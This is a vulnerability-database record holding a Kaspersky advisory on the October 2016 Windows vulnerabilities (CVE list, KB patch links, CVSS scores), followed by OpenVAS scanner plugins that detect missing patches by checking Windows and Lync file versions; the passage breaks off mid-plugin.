{"id": "KLA10882", "bulletinFamily": "info", "title": "\r KLA10882Multiple vulnerabilities in Microsoft Windows ", "description": "### *Detect date*:\n10/11/2016\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft Windows. Malicious users can exploit these vulnerabilities to execute arbitrary code, gain privileges or obtain sensitive information.\n\n### *Affected products*:\nMicrosoft Windows 10 1511, 1607 \nMicrosoft Windows Vista Service Pack 2 \nMicrosoft Windows Server 2008 Service Pack 2 \nMicrosoft Windows 7 Service Pack 1 \nMicrosoft Windows Server 2008 R2 Service Pack 1 \nMicrosoft Windows 8.1 \nMicrosoft Windows Server 2012 \nMicrosoft Windows Server 2012 R2 \nMicrosoft Windows RT 8.1 \nMicrosoft Windows 10\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2016-3270](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3270>) \n[CVE-2016-3263](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3263>) \n[CVE-2016-3209](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3209>) \n[CVE-2016-3262](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3262>) \n[CVE-2016-7182](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-7182>) \n[CVE-2016-3396](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3396>) \n[CVE-2016-3393](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3393>) \n[CVE-2016-3298](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3298>) \n[CVE-2016-3376](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3376>) \n[CVE-2016-3341](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3341>) \n[CVE-2016-3266](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3266>) \n[CVE-2016-0070](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-0070>) \n[CVE-2016-0073](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-0073>) \n[CVE-2016-0075](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-0075>) \n[CVE-2016-0079](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-0079>) \n[CVE-2016-0142](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-0142>) \n[CVE-2016-7211](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-7211>) \n[CVE-2016-7188](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-7188>) \n[CVE-2016-7185](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-7185>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows Vista](<https://threats.kaspersky.com/en/product/Microsoft-Windows-Vista-4/>)\n\n### *CVE-IDS*:\n[CVE-2016-3270](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3270>)0.0Unknown \n[CVE-2016-3263](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3263>)0.0Unknown \n[CVE-2016-3209](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3209>)0.0Unknown \n[CVE-2016-3262](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3262>)0.0Unknown \n[CVE-2016-7182](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7182>)0.0Unknown \n[CVE-2016-3396](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3396>)0.0Unknown \n[CVE-2016-3393](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3393>)0.0Unknown \n[CVE-2016-3298](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3298>)0.0Unknown \n[CVE-2016-3376](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3376>)0.0Unknown \n[CVE-2016-3341](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3341>)0.0Unknown \n[CVE-2016-3266](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3266>)0.0Unknown \n[CVE-2016-0070](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0070>)0.0Unknown \n[CVE-2016-0073](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0073>)0.0Unknown \n[CVE-2016-0075](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0075>)0.0Unknown \n[CVE-2016-0079](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0079>)0.0Unknown \n[CVE-2016-0142](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0142>)0.0Unknown \n[CVE-2016-7211](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7211>)0.0Unknown \n[CVE-2016-7188](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7188>)0.0Unknown \n[CVE-2016-7185](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7185>)0.0Unknown\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4038788](<http://support.microsoft.com/kb/4038788>) \n[3183431](<http://support.microsoft.com/kb/3183431>) \n[3192441](<http://support.microsoft.com/kb/3192441>) \n[3191203](<http://support.microsoft.com/kb/3191203>) \n[3190847](<http://support.microsoft.com/kb/3190847>) \n[3194798](<http://support.microsoft.com/kb/3194798>) \n[3191256](<http://support.microsoft.com/kb/3191256>) \n[3192440](<http://support.microsoft.com/kb/3192440>) \n[3185331](<http://support.microsoft.com/kb/3185331>) \n[3193515](<http://support.microsoft.com/kb/3193515>) \n[3185332](<http://support.microsoft.com/kb/3185332>) \n[3192393](<http://support.microsoft.com/kb/3192393>) \n[3192392](<http://support.microsoft.com/kb/3192392>) \n[3200970](<http://support.microsoft.com/kb/3200970>)\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "published": "2016-10-11T00:00:00", "modified": "2020-07-22T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://threats.kaspersky.com/en/vulnerability/KLA10882", "reporter": "Kaspersky Lab", "references": [], "cvelist": ["CVE-2016-0075", "CVE-2016-3209", "CVE-2016-3396", "CVE-2016-3263", "CVE-2016-3393", "CVE-2016-7182", "CVE-2016-3341", "CVE-2016-0079", "CVE-2016-0070", "CVE-2016-3298", "CVE-2016-3376", "CVE-2016-0142", "CVE-2016-3266", "CVE-2016-3270", "CVE-2016-7211", "CVE-2016-0073", "CVE-2016-7188", "CVE-2016-7185", "CVE-2016-3262"], "type": "kaspersky", "lastseen": "2020-09-02T11:47:03", "edition": 43, "viewCount": 40, "enchantments": {"dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310809344", "OPENVAS:1361412562310807371", "OPENVAS:1361412562310809343", "OPENVAS:1361412562310809445", "OPENVAS:1361412562310809440", "OPENVAS:1361412562310809063", "OPENVAS:1361412562310809345", "OPENVAS:1361412562310809444", "OPENVAS:1361412562310809346", "OPENVAS:1361412562310807372"]}, {"type": "nessus", "idList": ["SMB_NT_MS16-122.NASL", "SMB_NT_MS16-124.NASL", "SMB_NT_MS16-123.NASL", "SMB_NT_MS16-120.NASL", "SMB_NT_MS16-126.NASL", "SMB_NT_MS16-125.NASL", "MACOSX_MS16-120.NASL"]}, {"type": "mskb", "idList": ["KB3195360", "KB3196067", "KB3193229", "KB3192892", "KB3192884", "KB3193227"]}, {"type": "kaspersky", "idList": ["KLA10884", "KLA11906", "KLA10883"]}, {"type": "cve", "idList": ["CVE-2016-3266", "CVE-2016-3341", "CVE-2016-3298", "CVE-2016-3393", "CVE-2016-7211", "CVE-2016-7185", "CVE-2016-3262", "CVE-2016-3270", "CVE-2016-3263", "CVE-2016-7188"]}, {"type": "attackerkb", "idList": ["AKB:CCCC3EB7-288A-483C-8127-3BC58A63E83D", "AKB:3ACBBD0F-FD4A-47AD-B36E-35C7A8EA68AA"]}, {"type": "symantec", "idList": ["SMNTC-93391", "SMNTC-93377", "SMNTC-93359", "SMNTC-93390", "SMNTC-93378", "SMNTC-93394", "SMNTC-93395", "SMNTC-93556", "SMNTC-93403", "SMNTC-93392"]}, {"type": "threatpost", "idList": ["THREATPOST:4C8F3F4DC21FE42681CBD7DA2E0E2B7C"]}, {"type": "thn", "idList": ["THN:231C21CDC15C09B8A58B71A738D875F1"]}, {"type": "mscve", "idList": ["MS:CVE-2016-3298", "MS:CVE-2016-7188", "MS:CVE-2016-3341", "MS:CVE-2016-3396", "MS:CVE-2016-0142", "MS:CVE-2016-7185", "MS:CVE-2016-3266", "MS:CVE-2016-3262", "MS:CVE-2016-3263", "MS:CVE-2016-3270"]}, {"type": "exploitdb", "idList": ["EDB-ID:40599", "EDB-ID:40600", "EDB-ID:40562", "EDB-ID:40601", "EDB-ID:40574", "EDB-ID:40572", "EDB-ID:40573", "EDB-ID:40598", "EDB-ID:40608"]}, {"type": "zdi", "idList": ["ZDI-16-512"]}], "modified": "2020-09-02T11:47:03", "rev": 2}, "score": {"value": 7.6, "vector": "NONE", "modified": "2020-09-02T11:47:03", "rev": 2}, "vulnersScore": 7.6}, "scheme": null}

{"openvas": [{"lastseen": "2020-06-10T19:47:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3209", "CVE-2016-3396", "CVE-2016-3263", "CVE-2016-3393", "CVE-2016-7182", "CVE-2016-3270", "CVE-2016-3262"], "description": "This host is missing a critical security\n update according to Microsoft Bulletin MS16-120.", "modified": "2020-06-08T00:00:00", "published": "2016-10-12T00:00:00", "id": "OPENVAS:1361412562310809346", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809346", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (3192884)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (3192884)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809346\");\n script_version(\"2020-06-08T14:40:48+0000\");\n script_cve_id(\"CVE-2016-3209\", \"CVE-2016-3262\", \"CVE-2016-3263\", \"CVE-2016-3270\",\n \"CVE-2016-3393\", \"CVE-2016-3396\", \"CVE-2016-7182\");\n script_bugtraq_id(93385, 93390, 93394, 93403, 93377, 93380, 93395);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-08 14:40:48 +0000 (Mon, 08 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-10-12 12:14:12 +0530 (Wed, 12 Oct 2016)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (3192884)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft Bulletin MS16-120.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to\n\n - The way that the Windows Graphics Device Interface (GDI) handles objects\n in memory.\n\n - The Windows kernel fails to properly handle objects in memory.\n\n - The Windows font library improperly handles specially crafted embedded fonts.\n\n - The Windows Graphics Component improperly handles objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in kernel mode, also could take control of the affected\n system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows Vista x32/x64 Service Pack 2\n\n - Microsoft Windows Server 2008 x32/x64 Service Pack 2\n\n - Microsoft Windows 7 x32/x64 Service Pack 1\n\n - Microsoft Windows Server 2008 R2 x64 Service Pack 1\n\n - Microsoft Windows 8.1 x32/x64\n\n - Microsoft Windows Server 2012/2012R2\n\n - Microsoft Windows 10 x32/x64\n\n - Microsoft Windows 10 Version 1511 x32/x64\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/kb/3192884\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/en-us/library/security/MS16-120\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/MS16-120\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(winVista:3, winVistax64:3, win7:2, win7x64:2, win2008:3, win2008x64:3,\n win2008r2:2, win2012:1, win2012R2:1, win8_1:1, win8_1x64:1, win10:1,\n win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nsysVer = fetch_file_version(sysPath:sysPath, file_name:\"win32k.sys\");\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!sysVer && !edgeVer){\n exit(0);\n}\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) > 0)\n{\n if(version_is_less(version:sysVer, test_version:\"6.3.9600.18470\"))\n {\n Vulnerable_range = \"Less than 6.3.9600.18470\";\n VULN = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) > 0)\n{\n if(version_is_less(version:sysVer, test_version:\"6.1.7601.23545\"))\n {\n Vulnerable_range = \"Less than 6.1.7601.23545\";\n VULN = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(win2012:1) > 0)\n{\n if(version_is_less(version:sysVer, test_version:\"6.2.9200.21977\"))\n {\n Vulnerable_range = \"Less than 6.2.9200.21977\";\n VULN = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(winVista:3, winVistax64:3, win2008:3, win2008x64:3) > 0)\n{\n if(version_is_less(version:sysVer, test_version:\"6.0.6002.19693\"))\n {\n Vulnerable_range = \"Less than 6.0.6002.19693\";\n VULN = TRUE ;\n }\n else if(version_in_range(version:sysVer, test_version:\"6.0.6002.23000\", test_version2:\"6.0.6002.24016\"))\n {\n Vulnerable_range = \"6.0.6002.23000 - 6.0.6002.24016\";\n VULN = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(win10:1, win10x64:1) > 0)\n{\n if(version_is_less(version:edgeVer, test_version:\"11.0.10240.17146\"))\n {\n Vulnerable_range2 = \"Less than 11.0.10240.17146\";\n VULN2 = TRUE ;\n }\n else if(version_in_range(version:edgeVer, test_version:\"11.0.10586.0\", test_version2:\"11.0.10586.632\"))\n {\n Vulnerable_range2 = \"11.0.10586.0 - 11.0.10586.632\";\n VULN2 = TRUE ;\n }\n\n else if(version_in_range(version:edgeVer, test_version:\"11.0.14393.0\", test_version2:\"11.0.14393.320\"))\n {\n Vulnerable_range2 = \"11.0.14393.0 - 11.0.14393.320\";\n VULN2 = TRUE ;\n }\n}\n\nif(VULN)\n{\n report = 'File checked: ' + sysPath + \"\\win32k.sys\" + '\\n' +\n 'File version: ' + sysVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n}\n\nelse if(VULN2)\n{\n report = 'File checked: ' + sysPath + \"\\edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range2 + '\\n' ;\n security_message(data:report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-10T19:48:40", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3341", "CVE-2016-3376", "CVE-2016-3266", "CVE-2016-7211", "CVE-2016-7185"], "description": "This host is missing an important security\n update according to Microsoft Bulletin MS16-123.", "modified": "2020-06-08T00:00:00", "published": "2016-10-12T00:00:00", "id": "OPENVAS:1361412562310809343", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809343", "type": "openvas", "title": "Microsoft Windows Kernel-Mode Drivers Privilege Elevation Vulnerabilities (3192892)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Kernel-Mode Drivers Privilege Elevation Vulnerabilities (3192892)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809343\");\n script_version(\"2020-06-08T14:40:48+0000\");\n script_cve_id(\"CVE-2016-3266\", \"CVE-2016-3376\", \"CVE-2016-7185\", \"CVE-2016-7211\",\n \"CVE-2016-3341\");\n script_bugtraq_id(93384, 93388, 93389, 93391);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-08 14:40:48 +0000 (Mon, 08 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-10-12 07:44:40 +0530 (Wed, 12 Oct 2016)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Windows Kernel-Mode Drivers Privilege Elevation Vulnerabilities (3192892)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft Bulletin MS16-123.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - The kernel-mode driver fails to properly handle objects in memory.\n\n - The Windows Transaction Manager improperly handles objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n could run arbitrary code in kernel mode. An attacker could then install programs\n view, change, or delete data, or create new accounts with full user rights, and\n take control over the affected system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows Vista x32/x64 Service Pack 2\n\n - Microsoft Windows Server 2008 x32/x64 Service Pack 2\n\n - Microsoft Windows 7 x32/x64 Service Pack 1\n\n - Microsoft Windows Server 2008 R2 x64 Service Pack 1\n\n - Microsoft Windows 8.1 x32/x64\n\n - Microsoft Windows Server 2012/2012R2\n\n - Microsoft Windows 10 x32/x64\n\n - Microsoft Windows 10 Version 1511 x32/x64\n\n - Microsoft Windows 10 Version 1607 x32/x64\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/kb/3192892\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/MS16-123\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(winVista:3, winVistax64:3, win7:2, win7x64:2, win2008:3, win2008x64:3,\n win2008r2:2, win2012:1, win2012R2:1, win8_1:1, win8_1x64:1, win10:1,\n win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nwin32Ver = fetch_file_version(sysPath:sysPath, file_name:\"win32k.sys\");\nmrxVer = fetch_file_version(sysPath:sysPath, file_name:\"drivers\\mrxdav.sys\");\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!win32Ver && !mrxVer && !edgeVer){\n exit(0);\n}\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) > 0 && win32Ver)\n{\n if(win32Ver && version_is_less(version:win32Ver, test_version:\"6.3.9600.18470\"))\n {\n Vulnerable_range = \"Less than 6.3.9600.18470\";\n VULN = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) > 0 && win32Ver)\n{\n if(win32Ver && version_is_less(version:win32Ver, test_version:\"6.1.7601.23545\"))\n {\n Vulnerable_range = \"Less than 6.1.7601.23545\";\n VULN = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(win2012:1) > 0 && win32Ver)\n{\n if(win32Ver && version_is_less(version:win32Ver, test_version:\"6.2.9200.21977\"))\n {\n Vulnerable_range = \"Less than 6.2.9200.21977\";\n VULN = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(winVista:3, winVistax64:3, win2008:3, win2008x64:3) > 0)\n{\n if(win32Ver && version_is_less(version:win32Ver, test_version:\"6.0.6002.19693\"))\n {\n Vulnerable_range = \"Less than 6.0.6002.19693\";\n VULN = TRUE ;\n }\n else if(win32Ver && version_in_range(version:win32Ver, test_version:\"6.0.6002.23000\", test_version2:\"6.0.6002.24016\"))\n {\n Vulnerable_range = \"6.0.6002.23000 - 6.0.6002.24016\";\n VULN = TRUE ;\n }\n else if(mrxVer && version_is_less(version:mrxVer, test_version:\"6.0.6002.19691\"))\n {\n Vulnerable_range1 = \"Less than 6.0.6002.19691\";\n VULN1 = TRUE ;\n }\n else if(mrxVer && version_in_range(version:mrxVer, test_version:\"6.0.6002.23000\", test_version2:\"6.0.6002.24015\"))\n {\n Vulnerable_range1 = \"6.0.6002.23000 - 6.0.6002.24016\";\n VULN1 = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(win10:1, win10x64:1) > 0 && edgeVer)\n{\n if(edgeVer && version_is_less(version:edgeVer, test_version:\"11.0.10240.17146\"))\n {\n Vulnerable_range2 = \"Less than 11.0.10240.17146\";\n VULN2 = TRUE ;\n }\n else if(edgeVer && version_in_range(version:edgeVer, test_version:\"11.0.10586.0\", test_version2:\"11.0.10586.632\"))\n {\n Vulnerable_range2 = \"11.0.10586.0 - 11.0.10586.632\";\n VULN2 = TRUE ;\n }\n else if(edgeVer && version_in_range(version:edgeVer, test_version:\"11.0.14393.0\", test_version2:\"11.0.14393.320\"))\n {\n Vulnerable_range2 = \"11.0.14393.0 - 11.0.14393.320\";\n VULN2 = TRUE ;\n }\n}\n\nif(VULN)\n{\n report = 'File checked: ' + sysPath + \"\\win32k.sys\" + '\\n' +\n 'File version: ' + win32Ver + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n}\n\nelse if(VULN1)\n{\n report = 'File checked: ' + sysPath + \"\\drivers\\mrxdav.sys\" + '\\n' +\n 'File version: ' + mrxVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range1 + '\\n' ;\n security_message(data:report);\n exit(0);\n}\n\nelse if(VULN2)\n{\n report = 'File checked: ' + sysPath + \"\\edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range2 + '\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:58:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3209", "CVE-2016-3396", "CVE-2016-3263", "CVE-2016-7182", "CVE-2016-3262"], "description": "This host is missing an important security\n update according to Microsoft Bulletin MS16-120.", "modified": "2019-12-20T00:00:00", "published": "2016-10-12T00:00:00", "id": "OPENVAS:1361412562310809444", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809444", "type": "openvas", "title": "Microsoft Lync Multiple Vulnerabilities (3192884)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Lync Multiple Vulnerabilities (3192884)\n#\n# Authors:\n# Tushar Khelge <ktushar@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809444\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2016-3209\", \"CVE-2016-3262\", \"CVE-2016-3263\", \"CVE-2016-3396\",\n \"CVE-2016-7182\");\n script_bugtraq_id(93385, 93390, 93394, 93380, 93395);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-10-12 12:47:25 +0530 (Wed, 12 Oct 2016)\");\n script_name(\"Microsoft Lync Multiple Vulnerabilities (3192884)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft Bulletin MS16-120.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - The Windows Graphics Device Interface (GDI) improperly handles objects\n in memory.\n\n - The windows font library which improperly handles specially crafted\n embedded fonts.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to execute arbitrary code on the affected system and gain\n access to potentially sensitive information.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Lync 2010\n\n - Microsoft Lync 2013\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/kb/3192884\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/MS16-120\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\", \"secpod_ms_lync_detect_win.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"MS/Lync/Installed\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(get_kb_item(\"MS/Lync/Ver\"))\n{\n lyncPath = get_kb_item(\"MS/Lync/path\");\n\n ## For MS Lync Basic\n if(!lyncPath){\n lyncPath = get_kb_item(\"MS/Lync/Basic/path\");\n }\n\n if(lyncPath)\n {\n lyncPath1 = lyncPath + \"OFFICE14\";\n commVer = fetch_file_version(sysPath:lyncPath1, file_name:\"Rtmpltfm.dll\");\n if(commVer)\n {\n if(commVer =~ \"^4\" && version_in_range(version:commVer, test_version:\"4.0\", test_version2:\"4.0.7577.4520\"))\n {\n report = 'File checked: ' + lyncPath1 + \"\\Rtmpltfm.dll\" + '\\n' +\n 'File version: ' + commVer + '\\n' +\n 'Vulnerable range: ' + \"4.0 - 4.0.7577.4520\" + '\\n' ;\n security_message(data:report);\n }\n }\n\n lyncPath2 = lyncPath + \"OFFICE15\";\n fileVer = fetch_file_version(sysPath:lyncPath2, file_name:\"lynchtmlconv.exe\");\n if(fileVer)\n {\n if(version_in_range(version:fileVer, test_version:\"15.0\", test_version2:\"15.0.4867.999\"))\n {\n report = 'File 